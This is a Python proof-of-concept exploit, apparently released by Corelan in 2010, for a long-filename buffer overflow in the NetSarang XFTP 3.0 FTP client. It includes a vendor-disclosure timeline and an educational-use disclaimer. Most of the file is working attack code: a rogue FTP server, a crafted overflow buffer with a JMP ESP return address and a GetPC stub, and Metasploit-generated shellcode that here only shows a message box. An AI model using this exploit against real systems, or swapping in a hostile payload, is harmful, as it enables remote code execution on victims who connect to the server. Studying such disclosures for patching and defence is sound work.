#!/usr/bin/python
import socket import sys
""" |------------------------------------------------------------------| | __ __ | | _________ ________ / /___ _____ / /____ ____ _____ ___ | | / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ | | / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | | | | http://www.corelan.be:8800 | | | |-------------------------------------------------[ EIP Hunters ]--|
XFTP 3.0 Build 0239 Long filename Buffer Overflow Tested on: BT4 (attacker) + Windows XP SP3 ENG (victim) + XFTP 3.0 Build 0239 or 0238 Found and coded by sinn3r - x90.sinner{at}gmail{d0t}c0m Issue fixed in version : v3.0 Build 0242 & 0243 Greetz: Corelan Security & Exploit-DB.com http://twitter.com/_sinn3r Thanks : Corelan Security would like to thank NetSarang, Inc. for working with us and resolving the issue; Special thanks to Andrew Chang for communication. Also thanks to corelanc0d3r
Description: NetSarang XFTP 3.0 is a FTP client that is vulnerable to a buffer overflow when handling a long file name retrieved using "LIST". In order to trigger the overflow, the attacker must serve the malicious response as a FTP server, and trick the victim into double clicking on the filename. This proof of concept uses ACTIVE mode to transfer. If the first LIST transfer fails, reconnect again.
Please Note : 1) Script provided 'as is', without any warranty. Use for educational purposes only. Do not use this code to do anything illegal. 2) You are not allowed to edit/modify this code. If you do, Corelan cannot be held responsible for any damages this may cause.
Timeline: 05/17/10 - Vendor contacted 05/25/10 - Reminder sent 05/26/10 - Patched version received (v3.0 0242) 05/31/2010 - Xftp 3.0 Build 0243 released. Public.
For more technical details, visit: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-046 """
## ./msfpayload windows/messagebox exitfunc=thread TEXT="by sinn3r" TITLE="Demo by Corelan" messagebox = ( "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIHYJKMK8Y2T7TZTP1XRNRRZVQ9YSTL" "KT1VPLKSFDLLKSFULLKG6THLK3NQ0LK7FP80OUH2UL3V95Q8QKOM1CPLK2LFD6DLKW5GLLK1DUU48C1JJLKQZUHL" "K1JWP31ZKKSVWG9LKP4LKEQJNP1KO6Q9PKLNLMTIP2TDJIQXOTMC1HGM9L1KOKOKOGKSLFDQ8RUYNLK0ZVDS1JKU" "6LKTLPKLK0ZELUQJKLKUTLK5QM8MYPDVDEL3QO3OB5XQ9YDMYZEK9O2RHLNPNDNZL62KXMLKOKOKOK9QUUTOKZO8" "NKPSPLGULWTPRZHLKKOKOKOLIW5THBH2LRL7PKO58VS6RVNU4CXT5T3CUCBK8QL7TUZMYM6PVKOV55TMYHBF0OKO" "XY20MOLLG5LFD0RM8QNKOKOKO582LSQ2NPXU8QS2OBRSUE8GPSRSIQ058G42ERMRO6Q9KMXQLWT4OK9JC3X2R68W" "P10SX592NRNVSE8U2BY7PRSVQIYMX0LQ439K9KQFQYBQB63PQPRKON06QIPPPKOF5UXEZA" );
## EAX getPC getpc= ( "\x75\x03\x58\xff\xd0\xe8\xf8\xff" "\xff\xff" );
## The filename which contains our malicious code ## Peter's test: offset=232 bytes to EIP evil = ( "\x41"*224+ "\xa9\x31\xe3\x74" #0x74E331A9 JMP ESP RICHED20.dll "\x90\x90\x90\x90" "\xa9\x31\xe3\x74"+ #0x74E331A9 JMP ESP RICHED20.dll "\x90"*12+ #Alignment getpc+ messagebox+ #MessageboxA shellcode "\x90"*100 #NOPs );
## Main FTP server ## If the 1st LIST transfer fails, try again. def ftp(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", 21)) print "[*] Port 21 up. ph33r!" s.listen(10) rport = 0 addr = "" while 1: c, addr = s.accept() c.send("200 Hola Mundo!\r\n") print "[*] %s connected" %addr[0] while 1: data = c.recv(1024) if "USER" in data: c.send("331 OK\r\n") print "[*] 331 USER = %s" %data.split(" ")[1], elif "PASS" in data: c.send("230 OK\r\n") print "[*] 230 PASS = %s" %data.split(" ")[1], elif "PORT" in data: tmp = data.split(" ")[1].split(",") rport = int(tmp[4])*256+int(tmp[5]) c.send("200 OK\r\n") print "[*] 200 PORT set to %s" %rport elif "TYPE" in data: c.send("200 OK\r\n") print "[*] 200 TYPE" elif "PWD" in data: c.send("257 \"/\" is current directory\r\n") print "[*] 257 PWD" elif "CWD" in data: c.send("257 \"/\" is current directory\r\n") print "[*] 257 CWD" elif "SYST" in data: c.send("215 UNIX Type: L8\r\n") print "[*] SYST 215" elif "LIST" in data: dir = "-rw-rw-r-- 1 1176 1176 1060 Apr 23 23:17 %s.bin\r\n\r\n" c.send("150 OK.\r\n226 Directory ok\r\n") _s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) _s.connect((addr[0], rport)) _s.send(dir %evil) _s.close() print "[*] LIST sent. Check messagebox." c.close() break else: try: c.send("500 Meh...\r\n") except: c.close() break
def main(): try: ftp() except KeyboardInterrupt: print "\r\n[*] Adios!" sys.exit(0)
if __name__ == "__main__": print "|------------------------------------------------------" print "| XFTP 3.0 Build 0239 Long filename Buffer Overflow |" print "| coded by sinn3r twitter.com/_sinn3r |" print "|-----------------------------------------------------|" main()
|